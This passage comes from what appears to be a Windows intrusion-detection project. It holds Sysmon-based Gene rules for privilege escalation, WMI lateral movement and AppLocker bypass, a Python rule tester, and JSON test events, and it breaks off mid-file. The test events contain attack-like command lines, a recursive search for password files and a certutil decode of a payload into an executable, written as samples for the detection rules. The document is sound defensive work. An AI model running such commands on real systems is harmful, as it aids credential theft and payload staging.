88 | "Comments": "Suspicious Write Access requested by privileged processes. Disabled because it seems there are too many cases (likely leading to easy bypass and possible FPs)", 89 | "ATTACK": [ 90 | { 91 | "ID": "T1055", 92 | "Tactic": "privilege-escalation", 93 | "Reference": "https://attack.mitre.org/techniques/T1055" 94 | } 95 | ], 96 | "Disable": true, 97 | "Schema": "2.0.0" 98 | }, 99 | "Matches": [ 100 | "$ga: GrantedAccess &= '0x20'", 101 | "$srcservices: SourceImage ~= '(?i:{{system}}services\\.exe)'", 102 | "$srcsrchidx: SourceImage ~= '(?i:{{system}}searchindexer\\.exe)'", 103 | "$srccomptel: SourceImage ~= '(?i:{{system}}CompatTelRunner\\.exe)'", 104 | "$srcsppsvc: SourceImage ~= '(?i:{{system}}sppsvc\\.exe)'", 105 | "$tgtsvchost: TargetImage ~= '(?i:{{system}}svchost\\.exe)'", 106 | "$tgtprothost: TargetImage ~= '(?i:{{system}}searchprotocolhost\\.exe)'", 107 | "$tgtcomptel: TargetImage ~= '(?i:{{system}}CompatTelRunner\\.exe)'", 108 | "$tgtsppext: TargetImage ~= '(?i:{{system}}SppExtComObj\\.exe)'", 109 | "$srcisparent: SourceProcessGUID = @TargetParentProcessGuid", 110 | "$srcil: SourceIntegrityLevel ~= '(System|High)'", 111 | "$tgtil: TargetIntegrityLevel ~= '(System|High)'", 112 | "$srcwl: SourceImage ~= '(?i:{{system}}(lsass|csrss|conhost|consent)\\.exe)'", 113 | "$svcwl: SourceServices ~= '^(Schedule|Themes|Winmgmt|{{sysmon-svc}}|BrokerInfrastructure,DcomLaunch,Power,SystemEventsBroker)$'" 114 | ], 115 | "Condition": "$ga and ($srcil and $tgtil) and !($srcisparent or $srcwl or $svcwl or ($srcservices and $tgtsvchost) or ($srccomptel and $tgtcomptel) or ($srcsrchidx and $tgtprothost) or ($srcsppsvc and $tgtsppext))" 116 | } 117 | 118 | -------------------------------------------------------------------------------- /rules/whids/polymorphic.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "HighlyPolymorphicCode", 3 | "Tags": [ 4 | "WHIDS" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 25 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 10, 14 | "ATTACK": [ 15 | { 16 | "ID": "T1093", 17 | "Tactic": "defense-evasion", 18 | "Reference": "https://attack.mitre.org/techniques/T1093" 19 | } 20 | ], 21 | "Author": "0xrawsec", 22 | "Comments": "Experimental rule to catch polymorphic code", 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$lowboundproc: ProcessIntegrity >= '50'" 27 | ], 28 | "Condition": "$lowboundproc" 29 | } 30 | 31 | { 32 | "Name": "MediumPolymorphicCode", 33 | "Tags": [ 34 | "WHIDS" 35 | ], 36 | "Meta": { 37 | "Events": { 38 | "Microsoft-Windows-Sysmon/Operational": [ 39 | 25 40 | ] 41 | }, 42 | "Computers": [], 43 | "Criticality": 8, 44 | "ATTACK": [ 45 | { 46 | "ID": "T1093", 47 | "Tactic": "defense-evasion", 48 | "Reference": "https://attack.mitre.org/techniques/T1093" 49 | } 50 | ], 51 | "Author": "0xrawsec", 52 | "Comments": "Experimental rule to catch polymorphic code", 53 | "Schema": "2.0.0" 54 | }, 55 | "Matches": [ 56 | "$lowboundproc: ProcessIntegrity >= '15'", 57 | "$upboundproc: ProcessIntegrity < '50'" 58 | ], 59 | "Condition": "$lowboundproc and $upboundproc" 60 | } 61 | 62 | -------------------------------------------------------------------------------- /rules/whids/privesc.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "ProcPrivEsc", 3 | "Tags": [ 4 | "WHIDS" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 10 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 8, 14 | "Author": "0xrawsec", 15 | "Comments": "Write Access to a higher process integrity", 16 | "ATTACK": [], 17 | "Schema": "2.0.0" 18 | }, 19 | "Matches": [ 20 | "$ga: GrantedAccess &= '0x20'", 21 | "$srclow: SourceIntegrityLevel = 'Low'", 22 | "$srcmed: SourceIntegrityLevel = 'Medium'", 23 | "$srchigh: SourceIntegrityLevel = 'High'", 24 | "$tgtmed: TargetIntegrityLevel = 'Medium'", 25 | "$tgthigh: TargetIntegrityLevel = 'High'", 26 | "$tgtsys: TargetIntegrityLevel = 'System'" 27 | ], 28 | "Condition": "$ga and (($srclow and ($tgtmed or $tgthigh or $tgtsys)) or ($srcmed and ($tgthigh or $tgtsys)) or ($srchigh and $tgtsys))" 29 | } 30 | 31 | { 32 | "Name": "FilePrivEsc", 33 | "Tags": [ 34 | "WHIDS" 35 | ], 36 | "Meta": { 37 | "Events": { 38 | "Microsoft-Windows-Sysmon/Operational": [ 39 | 11 40 | ] 41 | }, 42 | "Computers": [], 43 | "Criticality": 10, 44 | "Author": "0xrawsec", 45 | "Comments": "File creation from a medium/low process integrity to sensitive directories.", 46 | "ATTACK": [], 47 | "Schema": "2.0.0" 48 | }, 49 | "Matches": [ 50 | "$wl: TargetFilename ~= '(?i:C:\\\\(Users|ProgramData)\\\\.*)'", 51 | "$il: IntegrityLevel ~= '(Low|Medium)'" 52 | ], 53 | "Condition": "$il and !$wl" 54 | } 55 | 56 | -------------------------------------------------------------------------------- /rules/whids/services.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "UntrustedService", 3 | "Tags": [ 4 | "WHIDS" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 7 10 | ] 11 | }, 12 | "Computers": [], 13 | "ATTACK": [ 14 | { 15 | "ID": "T1035", 16 | "Tactic": "Execution", 17 | "Reference": "https://attack.mitre.org/techniques/T1035/" 18 | } 19 | ], 20 | "Criticality": 10, 21 | "Disable": false, 22 | "Author": "0xrawsec", 23 | "Comments": "Rule to catch services with an untrusted signature.", 24 | "Requirements": "Hook enabled in Whids", 25 | "Schema": "2.0.0" 26 | }, 27 | "Matches": [ 28 | "$loaded: ImageLoaded ~= '(?i:\\.exe$)'", 29 | "$pservice: ParentImage ~= '(?i:{{system}}services\\.exe)'", 30 | "$trusted: Signature ~= '{{trusted-dll-sig}}'" 31 | ], 32 | "Condition": "$loaded and $pservice and !$trusted" 33 | } 34 | 35 | { 36 | "Name": "UnknownServices", 37 | "Tags": [ 38 | "WHIDS" 39 | ], 40 | "Meta": { 41 | "Events": { 42 | "Microsoft-Windows-Sysmon/Operational": [ 43 | 1 44 | ] 45 | }, 46 | "Computers": [], 47 | "Criticality": 10, 48 | "Disable": false, 49 | "Author": "0xrawsec", 50 | "Comments": "Rule to catch any non standard windows 10\u00a0services", 51 | "Requirements": "Hook enabled in Whids", 52 | "Schema": "2.0.0" 53 | }, 54 | "Matches": [ 55 | "$exist: Services ~= '.'", 56 | "$na: Services = 'N/A'", 57 | "$hosted: Image ~= '(?i:\\\\(lsass|svchost)\\.exe$)'", 58 | "$sysmon: Services = '{{sysmon-svc}}'", 59 | "$win10shared: Services ~= '{{win10shared}}'", 60 | "$win10svcs: Services ~= '{{win10svcs}}'" 61 | ], 62 | "Condition": "$exist and !($na or $sysmon or ($hosted and $win10shared) or $win10svcs)" 63 | } 64 | 65 | -------------------------------------------------------------------------------- /rules/whitelist.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "NotWhitelisted", 3 | "Tags": [ 4 | "Whitelist" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1, 10 | 6, 11 | 7 12 | ] 13 | }, 14 | "Computers": [], 15 | "Criticality": 8, 16 | "Author": "0xrawsec", 17 | "Comment": "Check if a hash is not in whitelist container", 18 | "Schema": "2.0.0" 19 | }, 20 | "Matches": [ 21 | "$md5: extract('MD5=(?P[A-F0-9]{32})', Hashes) in whitelist", 22 | "$sha1: extract('SHA1=(?P[A-F0-9]{40})', Hashes) in whitelist", 23 | "$sha256: extract('SHA256=(?P[A-F0-9]{64})', Hashes) in whitelist" 24 | ], 25 | "Condition": "!($md5 and $sha1 and $sha256)" 26 | } 27 | 28 | -------------------------------------------------------------------------------- /rules/wmi.gen: -------------------------------------------------------------------------------- 1 | { 2 | "Name": "WMIPrvseCommand", 3 | "Tags": [ 4 | "WMI" 5 | ], 6 | "Meta": { 7 | "Events": { 8 | "Microsoft-Windows-Sysmon/Operational": [ 9 | 1 10 | ] 11 | }, 12 | "Computers": [], 13 | "Criticality": 8, 14 | "ATTACK": [ 15 | { 16 | "ID": "T1047", 17 | "Tactic": "execution", 18 | "Reference": "https://attack.mitre.org/techniques/T1047" 19 | } 20 | ], 21 | "Author": "@0xrawsec", 22 | "Comment": "This rule catches the processes spawned using WMI.", 23 | "Schema": "2.0.0" 24 | }, 25 | "Matches": [ 26 | "$wmi: ParentImage ~= '(?i:\\\\wmiprvse\\.exe$)'" 27 | ], 28 | "Condition": "$wmi" 29 | } 30 | 31 | { 32 | "Name": "SuspWMIC", 33 | "Tags": [ 34 | "WMI" 35 | ], 36 | "Meta": { 37 | "Events": { 38 | "Microsoft-Windows-Sysmon/Operational": [ 39 | 1 40 | ] 41 | }, 42 | "Computers": [], 43 | "Criticality": 8, 44 | "Author": "@0xrawsec", 45 | "Comment": "WMIC suspicious command line", 46 | "Schema": "2.0.0" 47 | }, 48 | "Matches": [ 49 | "$wmic: Image ~= '(?i:\\\\wmic\\.exe$)'", 50 | "$proc: CommandLine ~= '(?i:process\\s+call\\s+create)'" 51 | ], 52 | "Condition": "$wmic and $proc" 53 | } 54 | 55 | { 56 | "Name": "LateralWMI", 57 | "Tags": [ 58 | "WMI", 59 | "Lateral" 60 | ], 61 | "Meta": { 62 | "Events": { 63 | "Microsoft-Windows-Sysmon/Operational": [ 64 | 1 65 | ] 66 | }, 67 | "Computers": [], 68 | "Criticality": 8, 69 | "Author": "@0xrawsec", 70 | "Comment": "This rule catches lateral movement done with WMI", 71 | "Schema": "2.0.0" 72 | }, 73 | "Matches": [ 74 | "$wmi: Image ~= '(?i:\\\\wmic\\.exe$)'", 75 | "$node: CommandLine ~= '(?i:/node:)'" 76 | ], 77 | "Condition": "$wmi and $node" 78 | } 79 | 80 | { 81 | "Name": "WMIApplockerBypassAttempt", 82 | "Tags": [ 83 | "WMI" 84 | ], 85 | "Meta": { 86 | "Events": { 87 | "Microsoft-Windows-Sysmon/Operational": [ 88 | 1 89 | ] 90 | }, 91 | "Computers": [], 92 | "Criticality": 8, 93 | "ATTACK": [ 94 | { 95 | "ID": "T1220", 96 | "Tactic": "execution", 97 | "Reference": "https://attack.mitre.org/techniques/T1220" 98 | } 99 | ], 100 | "Author": "@0xrawsec", 101 | "Comment": "WMI Applocker Bypass attempt", 102 | "Link": "https://subt0x11.blogspot.nl/2018/04/wmicexe-whitelisting-bypass-hacking.html?m=1", 103 | "Schema": "2.0.0" 104 | }, 105 | "Matches": [ 106 | "$wmi: Image ~= '(?i:\\\\wmic\\.exe$)'", 107 | "$format: CommandLine ~= '(?i:/format:.*\\.xsl)'" 108 | ], 109 | "Condition": "$wmi and $format" 110 | } 111 | 112 | { 113 | "Name": "WMIEvents", 114 | "Tags": [ 115 | "WMI" 116 | ], 117 | "Meta": { 118 | "Events": { 119 | "Microsoft-Windows-Sysmon/Operational": [ 120 | 19, 121 | 20, 122 | 21 123 | ] 124 | }, 125 | "Computers": [], 126 | "Criticality": 10, 127 | "ATTACK": [ 128 | { 129 | "ID": "T1084", 130 | "Tactic": "persistence", 131 | "Reference": "https://attack.mitre.org/techniques/T1084" 132 | } 133 | ], 134 | "Author": "@0xrawsec", 135 | "Comment": "This rule catches any WMI events. Any of them needs to be checked.", 136 | "Schema": "2.0.0" 137 | }, 138 | "Matches": [], 139 | "Condition": "" 140 | } 141 | 142 | -------------------------------------------------------------------------------- /scripts/requirements.txt: -------------------------------------------------------------------------------- 1 | PyYAML>=3.11 2 | -------------------------------------------------------------------------------- /scripts/tester.conf.example: -------------------------------------------------------------------------------- 1 | params: 2 | # Gene binary location 3 | gene: /path/to/gene/binary 4 | # Gene rules location 5 | rules: /path/to/gene/rules 6 | # Root directory for the test files 7 | tests-root: /root/to/test/files 8 | 9 | # configure the test cases 10 | # key: is the rule name (as defined in gene rule) 11 | # value: is the test file relative to tests-root 12 | # files may be reused for several test cases 13 | tests: 14 | AutomatedRecursiveDir: AutomatedRecursiveDir.json 15 | BrowserChild: BrowserChild.json 16 | CertutilSuspDecode: CertutilSuspDecode.json 17 | DownloadPath: DownloadPath.json 18 | EmbeddedHTTPLinkInCL: EmbeddedHTTPLinkInCL.json 19 | EventClearing: EventClearing.json 20 | ExecDownloadedDocument: ExecDownloadedDocument.json 21 | ExecTimestomping: ExecTimestomping.json 22 | ExecutableADS: ExecutableADS.json 23 | ExecutableFileCreated: ExecutableFileCreated.json 24 | ExecutableUnkExt: ExecutableUnkExt.json 25 | ExplicitNetworkLogon: ExplicitNetworkLogon.json 26 | Heur7zExec: Heur7zExec.json 27 | HeurADSInCL: HeurADSInCL.json 28 | HeurCallShellcode: HeurCallShellcode.json 29 | HeurCLWithCreds: HeurCLWithCreds.json 30 | HeurDropper: HeurDropper.json 31 | HeuristicSamlibDll: HeuristicSamlibDll.json 32 | HeuristicVaultcliDll: HeuristicVaultcliDll.json 33 | HeurPersistentRAT: HeurPersistentRAT.json 34 | HeurRAT: HeurRAT.json 35 | HeurRemotePayload: HeurRemotePayload.json 36 | HeurSpawnShell: HeurSpawnShell.json 37 | HeurZipExec: HeurZipExec.json 38 | HiddenPsExec: HiddenPsExec.json 39 | InfoRemotePath: InfoRemotePath.json 40 | InfoSuspiciousParent: InfoSuspiciousParent.json 41 | LargeBase64: LargeBase64.json 42 | LargeCL512: LargeCL512.json 43 | LargeCL999: LargeCL999.json 44 | LateralWMI: LateralWMI.json 45 | LogonFromExternal: LogonFromExternal.json 46 | MaliciousLsassAccess: MaliciousLsassAccess.json 47 | MaliciousSvchostAccess: MaliciousSvchostAccess.json 48 | MSOfficeThreat: MSOfficeThreat.json 49 | Nbtstat.exe: Nbtstat.exe.json 50 | Net.exe: Net.exe.json 51 | NewADS: NewADS.json 52 | NewAutorun: NewAutorun.json 53 | NewExeCreatedInRoot: NewExeCreatedInRoot.json 54 | NewRemoteScheduledTask: NewRemoteScheduledTask.json 55 | NewSchedTaskInReg: NewSchedTaskInReg.json 56 | NewSchedTaskOnDisk: NewSchedTaskOnDisk.json 57 | OfficeDropperExec: OfficeDropperExec.json 58 | OfficeDropper: OfficeDropper.json 59 | PowershellExecEnc: PowershellExecEnc.json 60 | PowershellLargeCL: PowershellLargeCL.json 61 | PowershellSamlibDll: PowershellSamlibDll.json 62 | PowershellStdin: PowershellStdin.json 63 | PsExec4624: PsExec4624.json 64 | PsExecCommand: PsExecCommand.json 65 | PsExec: PsExec.json 66 | Regsvr32ApplockerBypass: Regsvr32ApplockerBypass.json 67 | SecurityLogClearing: SecurityLogClearing.json 68 | ServiceDeletion: ServiceDeletion.json 69 | StopSvchostAccess: StopSvchostAccess.json 70 | SuspiciousADS: SuspiciousADS.json 71 | SuspiciousLsassAccess: SuspiciousLsassAccess.json 72 | SuspiciousRundll32: SuspiciousRundll32.json 73 | SuspiciousServiceCreated: SuspiciousServiceCreated.json 74 | SuspiciousService: SuspiciousService.json 75 | SvcHostUnsignedDll: SvcHostUnsignedDll.json 76 | SvcHostUntrustedDLL: SvcHostUntrustedDLL.json 77 | SysmonConfigChanged: SysmonConfigChanged.json 78 | SysmonFingerprinting: SysmonFingerprinting.json 79 | SysmonStateChanged: SysmonStateChanged.json 80 | SystemInfo.exe: SystemInfo.exe.json 81 | Tasklist.exe: Tasklist.exe.json 82 | UnkPrivDstPort: UnkPrivDstPort.json 83 | UntrustedDriverLoaded: UntrustedDriverLoaded.json 84 | UserTempExec: UserTempExec.json 85 | WindowsTempExec: WindowsTempExec.json 86 | WMIChildProcess: WMIChildProcess.json 87 | WMIEvents: WMIEvents.json 88 | Xcopy.exe: Xcopy.exe.json 89 | 90 | -------------------------------------------------------------------------------- /scripts/tester.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | 3 | import os 4 | import sys 5 | import yaml 6 | import argparse 7 | import subprocess 8 | from datetime import datetime 9 | 10 | def load_config(path): 11 | with open(path) as fd: 12 | return yaml.load(fd.read(), Loader=yaml.FullLoader) 13 | 14 | def has_test_option(gene_path): 15 | cmd = [gene_path, "-h"] 16 | cp = subprocess.run(cmd, capture_output=True, text=True) 17 | if "-test\n" in cp.stderr: 18 | return True 19 | return False 20 | 21 | def test(config): 22 | gene_path = config["params"]["gene"] 23 | rules_path = config["params"]["rules"] 24 | tests_root = config["params"]["tests-root"] 25 | 26 | if not has_test_option(gene_path): 27 | print("Gene binary {} does not have -test option, upgrade it") 28 | sys.exit(1) 29 | 30 | for rule_name, test_file in config["tests"].items(): 31 | fp_test_file = os.path.join(tests_root, test_file) 32 | if not os.path.isfile(fp_test_file): 33 | raise FileNotFoundError(fp_test_file) 34 | 35 | #print("Testing rule {}: {}".format(rule_name, test_file)) 36 | cmd = [gene_path, "-test", "-r", rules_path, "-n", rule_name, "-j", fp_test_file] 37 | start = datetime.now() 38 | cp = subprocess.run(cmd, capture_output=True, text=True) 39 | stop = datetime.now() 40 | delta = stop - start 41 | if cp.returncode == 0: 42 | print("Testing {} : SUCCESS (time={}s)".format(rule_name, delta.total_seconds())) 43 | else: 44 | print("Stderr:") 45 | print(str(cp.stderr)) 46 | print("Stdout:") 47 | print(str(cp.stdout)) 48 | print("Test rule {} : FAILED".format(rule_name)) 49 | sys.exit(cp.returncode) 50 | 51 | if __name__ == "__main__": 52 | 53 | parser = argparse.ArgumentParser() 54 | parser.add_argument("config", help="Tests configuration file") 55 | 56 | args = parser.parse_args() 57 | 58 | config = load_config(args.config) 59 | test(config) 60 | -------------------------------------------------------------------------------- /tests.md: -------------------------------------------------------------------------------- 1 | # Rules Coverage 2 | 3 | Testing AutomatedRecursiveDir : SUCCESS (time=0.021255s) 4 | 5 | Testing BrowserChild : SUCCESS (time=0.022967s) 6 | 7 | Testing CertutilSuspDecode : SUCCESS (time=0.022221s) 8 | 9 | Testing DownloadPath : SUCCESS (time=0.020403s) 10 | 11 | Testing EmbeddedHTTPLinkInCL : SUCCESS (time=0.02217s) 12 | 13 | Testing EventClearing : SUCCESS (time=0.021907s) 14 | 15 | Testing ExecDownloadedDocument : SUCCESS (time=0.021596s) 16 | 17 | Testing ExecTimestomping : SUCCESS (time=0.02261s) 18 | 19 | Testing ExecutableADS : SUCCESS (time=0.022413s) 20 | 21 | Testing ExecutableFileCreated : SUCCESS (time=0.023497s) 22 | 23 | Testing ExecutableUnkExt : SUCCESS (time=0.022258s) 24 | 25 | Testing ExplicitNetworkLogon : SUCCESS (time=0.024069s) 26 | 27 | Testing Heur7zExec : SUCCESS (time=0.023206s) 28 | 29 | Testing HeurADSInCL : SUCCESS (time=0.022508s) 30 | 31 | Testing HeurCallShellcode : SUCCESS (time=0.021487s) 32 | 33 | Testing HeurCLWithCreds : SUCCESS (time=0.021753s) 34 | 35 | Testing HeurDropper : SUCCESS (time=0.022784s) 36 | 37 | Testing HeuristicSamlibDll : SUCCESS (time=0.022972s) 38 | 39 | Testing HeuristicVaultcliDll : SUCCESS (time=0.021837s) 40 | 41 | Testing HeurPersistentRAT : SUCCESS (time=0.023436s) 42 | 43 | Testing HeurRAT : SUCCESS (time=0.021516s) 44 | 45 | Testing HeurRemotePayload : SUCCESS (time=0.023249s) 46 | 47 | Testing HeurSpawnShell : SUCCESS (time=0.023095s) 48 | 49 | Testing HeurZipExec : SUCCESS (time=0.021555s) 50 | 51 | Testing HiddenPsExec : SUCCESS (time=0.023188s) 52 | 53 | Testing LargeBase64 : SUCCESS (time=0.047693s) 54 | 55 | Testing LargeCL512 : SUCCESS (time=0.023542s) 56 | 57 | Testing LargeCL999 : SUCCESS (time=0.090004s) 58 | 59 | Testing LateralWMI : SUCCESS (time=0.0238s) 60 | 61 | Testing LogonFromExternal : SUCCESS (time=0.025126s) 62 | 63 | Testing MaliciousLsassAccess : SUCCESS (time=0.02069s) 64 | 65 | Testing MaliciousSvchostAccess : SUCCESS (time=0.022057s) 66 | 67 | Testing MSOfficeThreat : SUCCESS (time=0.025088s) 68 | 69 | Testing Nbtstat.exe : SUCCESS (time=0.022553s) 70 | 71 | Testing Net.exe : SUCCESS (time=0.022635s) 72 | 73 | Testing NewADS : SUCCESS (time=0.022627s) 74 | 75 | Testing NewAutorun : SUCCESS (time=0.022788s) 76 | 77 | Testing NewExeCreatedInRoot : SUCCESS (time=0.022224s) 78 | 79 | Testing NewRemoteScheduledTask : SUCCESS (time=0.023317s) 80 | 81 | Testing NewSchedTaskInReg : SUCCESS (time=0.023302s) 82 | 83 | Testing NewSchedTaskOnDisk : SUCCESS (time=0.02184s) 84 | 85 | Testing OfficeDropperExec : SUCCESS (time=0.0242s) 86 | 87 | Testing OfficeDropper : SUCCESS (time=0.021458s) 88 | 89 | Testing PowershellExecEnc : SUCCESS (time=0.023201s) 90 | 91 | Testing PowershellLargeCL : SUCCESS (time=0.040721s) 92 | 93 | Testing PowershellSamlibDll : SUCCESS (time=0.021212s) 94 | 95 | Testing PowershellStdin : SUCCESS (time=0.021048s) 96 | 97 | Testing PsExec4624 : SUCCESS (time=0.022262s) 98 | 99 | Testing PsExecCommand : SUCCESS (time=0.021541s) 100 | 101 | Testing PsExec : SUCCESS (time=0.021116s) 102 | 103 | Testing Regsvr32ApplockerBypass : SUCCESS (time=0.024256s) 104 | 105 | Testing SecurityLogClearing : SUCCESS (time=0.02134s) 106 | 107 | Testing ServiceDeletion : SUCCESS (time=0.022081s) 108 | 109 | Testing StopSvchostAccess : SUCCESS (time=0.02157s) 110 | 111 | Testing SuspiciousADS : SUCCESS (time=0.022787s) 112 | 113 | Testing SuspiciousLsassAccess : SUCCESS (time=0.024622s) 114 | 115 | Testing SuspiciousRundll32 : SUCCESS (time=0.02133s) 116 | 117 | Testing SuspiciousServiceCreated : SUCCESS (time=0.023298s) 118 | 119 | Testing SuspiciousService : SUCCESS (time=0.023949s) 120 | 121 | Testing SvcHostUnsignedDll : SUCCESS (time=0.023206s) 122 | 123 | Testing SvcHostUntrustedDLL : SUCCESS (time=0.023652s) 124 | 125 | Testing SysmonConfigChanged : SUCCESS (time=0.020811s) 126 | 127 | Testing SysmonFingerprinting : SUCCESS (time=0.020348s) 128 | 129 | Testing SysmonStateChanged : SUCCESS (time=0.021455s) 130 | 131 | Testing SystemInfo.exe : SUCCESS (time=0.023406s) 132 | 133 | Testing Tasklist.exe : SUCCESS (time=0.022158s) 134 | 135 | Testing UnkPrivDstPort : SUCCESS (time=0.021605s) 136 | 137 | Testing UntrustedDriverLoaded : SUCCESS (time=0.022744s) 138 | 139 | Testing UserTempExec : SUCCESS (time=0.022134s) 140 | 141 | Testing WindowsTempExec : SUCCESS (time=0.021277s) 142 | 143 | Testing WMIPrvseCommand : SUCCESS (time=0.022656s) 144 | 145 | Testing WMIEvents : SUCCESS (time=0.023587s) 146 | 147 | Testing Xcopy.exe : SUCCESS (time=0.022713s) 148 | 149 | Testing SuspWriteAccess : SUCCESS (time=0.021416s) 150 | 151 | Testing HighlyPolymorphicCode : SUCCESS (time=0.02334s) 152 | 153 | Testing MediumPolymorphicCode : SUCCESS (time=0.023213s) 154 | 155 | Testing HeurMaliciousAccess : SUCCESS (time=0.023135s) 156 | 157 | Testing UntrustedService : SUCCESS (time=0.021205s) 158 | 159 | Testing PSC#Win32API : SUCCESS (time=0.033039s) 160 | 161 | Testing HeurOfficeThreat : SUCCESS (time=0.025899s) 162 | 163 | Testing HeurWebShell : SUCCESS (time=0.035747s) 164 | 165 | Testing ExplorerInjection : SUCCESS (time=0.023452s) 166 | 167 | Testing FilePrivEsc : SUCCESS (time=0.023911s) 168 | 169 | Testing ProcPrivEsc : SUCCESS (time=0.025231s) 170 | 171 | Testing SuspWMIC : SUCCESS (time=0.022872s) 172 | 173 | Testing HeurSuspFileWrite : SUCCESS (time=0.040106s) 174 | 175 | Testing HeuristicPrivEsc : SUCCESS (time=0.022838s) 176 | 177 | Testing HeuristicSuspiciousAccess : SUCCESS (time=0.022106s) 178 | 179 | -------------------------------------------------------------------------------- /tests/AutomatedRecursiveDir.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "\"cmd\" /c dir \"C:\\Users\\*password*\" /b /s /a-d", 5 | "Company": "Microsoft Corporation", 6 | "CurrentDirectory": "C:\\Windows\\system32\\", 7 | "Description": "Windows Command Processor", 8 | "FileVersion": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", 9 | "Hashes": "SHA1=0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8,MD5=5746BD7E255DD6A8AFA06F7C42C1BA41,SHA256=DB06C3534964E3FC79D2763144BA53742D7FA250CA336F4A0FE724B75AAFF386,IMPHASH=D0058544E4588B1B2290B7F4D830EB0A", 10 | "Image": "C:\\Windows\\System32\\cmd.exe", 11 | "IntegrityLevel": "System", 12 | "LogonGuid": "{49F1AF32-356A-5AC7-0000-0020E7030000}", 13 | "LogonId": "0x3e7", 14 | "ParentCommandLine": "C:\\commander.exe -f", 15 | "ParentImage": "C:\\commander.exe", 16 | "ParentProcessGuid": "{49F1AF32-38A7-5AC7-0000-0010869A0A00}", 17 | "ParentProcessId": "920", 18 | "ProcessGuid": "{49F1AF32-38CB-5AC7-0000-00104F090D00}", 19 | "ProcessId": "956", 20 | "Product": "Microsoft® Windows® Operating System", 21 | "TerminalSessionId": "0", 22 | "User": "NT AUTHORITY\\SYSTEM", 23 | "UtcTime": "4242-04-24 13:37:42.422" 24 | }, 25 | "System": { 26 | "Channel": "Microsoft-Windows-Sysmon/Operational", 27 | "Computer": "BLAHBLAH", 28 | "Correlation": {}, 29 | "EventID": "1", 30 | "EventRecordID": "898286", 31 | "Execution": { 32 | "ProcessID": "1456", 33 | "ThreadID": "1712" 34 | }, 35 | "Keywords": "0x8000000000000000", 36 | "Level": "4", 37 | "Opcode": "0", 38 | "Provider": { 39 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 40 | "Name": "Microsoft-Windows-Sysmon" 41 | }, 42 | "Security": { 43 | "UserID": "S-1-5-18" 44 | }, 45 | "Task": "1", 46 | "TimeCreated": { 47 | "SystemTime": "4242-04-24 13:37:42.422" 48 | }, 49 | "Version": "5" 50 | } 51 | } 52 | } 53 | { 54 | "Event": { 55 | "EventData": { 56 | "CommandLine": "\"cmd\" /c dir \"C:\\Users\\*admin*\" /b /s /a-d", 57 | "Company": "Microsoft Corporation", 58 | "CurrentDirectory": "C:\\Windows\\system32\\", 59 | "Description": "Windows Command Processor", 60 | "FileVersion": "6.1.7601.17514 (win7sp1_rtm.101119-1850)", 61 | "Hashes": "SHA1=0F3C4FF28F354AEDE202D54E9D1C5529A3BF87D8,MD5=5746BD7E255DD6A8AFA06F7C42C1BA41,SHA256=DB06C3534964E3FC79D2763144BA53742D7FA250CA336F4A0FE724B75AAFF386,IMPHASH=D0058544E4588B1B2290B7F4D830EB0A", 62 | "Image": "C:\\Windows\\System32\\cmd.exe", 63 | "IntegrityLevel": "System", 64 | "LogonGuid": "{49F1AF32-356A-5AC7-0000-0020E7030000}", 65 | "LogonId": "0x3e7", 66 | "ParentCommandLine": "C:\\commander.exe -f", 67 | "ParentImage": "C:\\commander.exe", 68 | "ParentProcessGuid": "{49F1AF32-38A7-5AC7-0000-0010869A0A00}", 69 | "ParentProcessId": "920", 70 | "ProcessGuid": "{49F1AF32-38CB-5AC7-0000-00106D140D00}", 71 | "ProcessId": "1004", 72 | "Product": "Microsoft® Windows® Operating System", 73 | "TerminalSessionId": "0", 74 | "User": "NT AUTHORITY\\SYSTEM", 75 | "UtcTime": "4242-04-24 13:37:42.422" 76 | }, 77 | "System": { 78 | "Channel": "Microsoft-Windows-Sysmon/Operational", 79 | "Computer": "BLAHBLAH", 80 | "Correlation": {}, 81 | "EventID": "1", 82 | "EventRecordID": "898333", 83 | "Execution": { 84 | "ProcessID": "1456", 85 | "ThreadID": "1712" 86 | }, 87 | "Keywords": "0x8000000000000000", 88 | "Level": "4", 89 | "Opcode": "0", 90 | "Provider": { 91 | "Guid": "{5770385F-C22A-43E0-BF4C-06F5698FFBD9}", 92 | "Name": "Microsoft-Windows-Sysmon" 93 | }, 94 | "Security": { 95 | "UserID": "S-1-5-18" 96 | }, 97 | "Task": "1", 98 | "TimeCreated": { 99 | "SystemTime": "4242-04-24 13:37:42.422" 100 | }, 101 | "Version": "5" 102 | } 103 | } 104 | } 105 | -------------------------------------------------------------------------------- /tests/CertutilSuspDecode.json: -------------------------------------------------------------------------------- 1 | { 2 | "Event": { 3 | "EventData": { 4 | "CommandLine": "certutil -decode C:\\Programdata\\B4V2N7R2.txt C:\\Programdata\\Q7Y9F5Z1.exe", 5 | "CurrentDirectory": "C:\\Users\\Gen Eric\\Documents\\", 6 | "Hashes": "SHA1=8186D64DD28CD63CA883B1D3CE5F07AEABAD67C0,MD5=0D52559AEF4AA5EAC82F530617032283,SHA256=48850FB7229D99E48C3A749556684E962587058D612C659C58F8B8DB2D00ABEE,IMPHASH=61FA242F31501799B46DF49B9FCC76BB", 7 | "Image": "C:\\Windows\\SysWOW64\\certutil.exe", 8 | "IntegrityLevel": "Medium", 9 | "LogonGuid": "{49F1AF32-651B-5ABB-0000-00205D120100}", 10 | "LogonId": "0x1125d", 11 | "ParentCommandLine": "\"C:\\Program Files (x86)\\Microsoft Office\\Office12\\EXCEL.EXE\" /e", 12 | "ParentImage": "C:\\Program Files 